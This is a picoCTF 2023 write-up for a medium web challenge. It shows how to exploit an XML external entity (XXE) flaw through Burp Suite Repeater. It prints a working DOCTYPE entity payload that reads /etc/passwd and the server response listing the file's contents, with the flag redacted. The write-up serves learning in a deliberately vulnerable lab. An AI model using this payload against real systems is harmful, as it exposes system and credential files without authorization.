Level: Medium
Tags: picoCTF 2023, Web Exploitation, XXE
Author: GEOFFREY NJOGU
Description:
The web project was rushed and no security assessment was done.
Can you read the /etc/passwd file?
Hints:
1. XML external entity Injection
Challenge link: https://play.picoctf.org/practice/challenge/376
It's usually good practice to look through the source code of the web site but in this case we already know what we are looking for thanks to the hint. For more background on XXE see the references below.
Start BURP Suite and set 'Intercept' to off under the Proxy -> Intercept tab. Then configure your browser to use Burp as its proxy and go to the web site.
Clicking on any of the 'Details' buttons sends POST requests with the following payload
<?xml version="1.0" encoding="UTF-8"?><data><ID>2</ID></data>We will inject code in this payload to read the /etc/passwd file.
Under Proxy -> HTTP history tab right-click on any of the POST requests and 'Send to Repeater'. Then navigate to the Repeater tab.
In the XML-payload add <!DOCTYPE data [<!ENTITY pico SYSTEM '/etc/passwd'>]> between the first XML-line and <data>.
Then replace the number with &pico; and don't change anything else.
In total your XML-payload should look like this
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ENTITY pico SYSTEM '/etc/passwd'>]>
<data>
<ID>
&pico;
</ID>
</data>The 'pico' name is arbitrary and can be called anything. In many code examples it is called 'data' but I chose 'pico' here.
Press the 'Send'-button to send your request.
The response should look like this
HTTP/1.1 200 OK
Server: Werkzeug/2.2.3 Python/3.8.10
Date: Fri, 28 Jul 2023 11:58:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1023
Connection: close
Invalid ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flask:x:999:999::/app:/bin/sh
picoctf:x:1001:picoCTF{<REDACTED>}
The flag is included in the last line of the /etc/passwd file output.